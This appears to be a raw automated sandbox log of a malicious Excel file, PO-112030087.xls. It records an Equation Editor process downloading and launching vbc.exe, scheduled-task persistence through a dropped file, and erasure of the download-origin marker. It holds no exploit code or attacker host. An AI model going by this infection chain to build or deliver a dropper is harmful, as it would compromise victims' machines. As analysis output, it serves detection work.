Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {83B777CB-BA22-4166-AE7C-A3886C747AE4} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\rirjijj C:\Users\user\AppData\Roaming\rirjijj
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\rirjijj	Process created: C:\Users\user\AppData\Roaming\rirjijj C:\Users\user\AppData\Roaming\rirjijj
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\rirjijj C:\Users\user\AppData\Roaming\rirjijj
Source: C:\Users\user\AppData\Roaming\rirjijj	Process created: C:\Users\user\AppData\Roaming\rirjijj C:\Users\user\AppData\Roaming\rirjijj
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR814F.tmp

Jump to behavior

Source: C:\Windows\explorer.exe

Code function: 9_2_02933670 CoCreateInstance,

9_2_02933670

Source: C:\Windows\explorer.exe

Code function: 9_2_028C3C88 CreateToolhelp32Snapshot,SleepEx,

9_2_028C3C88

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: PO-112030087.xls

Static file information: File size 1421824 > 1048576

Source: B22F.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F582F push ds; retf	5_2_001F5A0D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F382E pushfd ; ret	5_2_001F3835
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F3863 pushfd ; ret	5_2_001F3835
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F551A push ecx; retf	5_2_001F551B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F39BC push edi; retf	5_2_001F4269
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F39B6 push edi; retf	5_2_001F4269
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F21EC push es; iretd	5_2_001F21EF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F59E9 push ds; retf	5_2_001F5A0D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F1236 push es; ret	5_2_001F1237
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F0665 push edx; ret	5_2_001F0666
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F06FD pushfd ; iretd	5_2_001F0708
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403062 push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040306F push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040307E push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403003 push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403035 push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030C2 push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030E0 push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403090 push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030A1 push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030A8 push ds; iretd	6_2_004030AA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030AB push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030B6 push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030BA push eax; ret	6_2_004030D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040263C push edi; iretd	6_2_0040263F
Source: C:\Windows\explorer.exe	Code function: 9_2_028C1787 push es; iretd	9_2_028C178D
Source: C:\Windows\explorer.exe	Code function: 9_2_02931787 push es; iretd	9_2_0293178D
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_0031582F push ds; retf	15_2_00315A0D
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_0031382E pushfd ; ret	15_2_00313835
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00313863 pushfd ; ret	15_2_00313835
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_0031551A push ecx; retf	15_2_0031551B

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_001291C9 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

18_2_001291C9

Source: initial sample	Static PE information: section name: .text entropy: 7.251350999383838
Source: initial sample	Static PE information: section name: .text entropy: 7.251350999383838
Source: initial sample	Static PE information: section name: .text entropy: 7.251350999383838

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rirjijj

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rirjijj	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036803EA LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_036803EA

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\rirjijj:Zone.Identifier read attributes | delete

Jump to behavior

Source: PO-112030087.xls	Stream path 'MBD018A264F/CONTENTS' entropy: 7.96651382787 (max. 8.0)
Source: PO-112030087.xls	Stream path 'MBD018A2652/CONTENTS' entropy: 7.96651382787 (max. 8.0)
Source: PO-112030087.xls	Stream path 'MBD018A2654/CONTENTS' entropy: 7.97877801699 (max. 8.0)
Source: PO-112030087.xls	Stream path 'MBD018A2655/CONTENTS' entropy: 7.97877801699 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
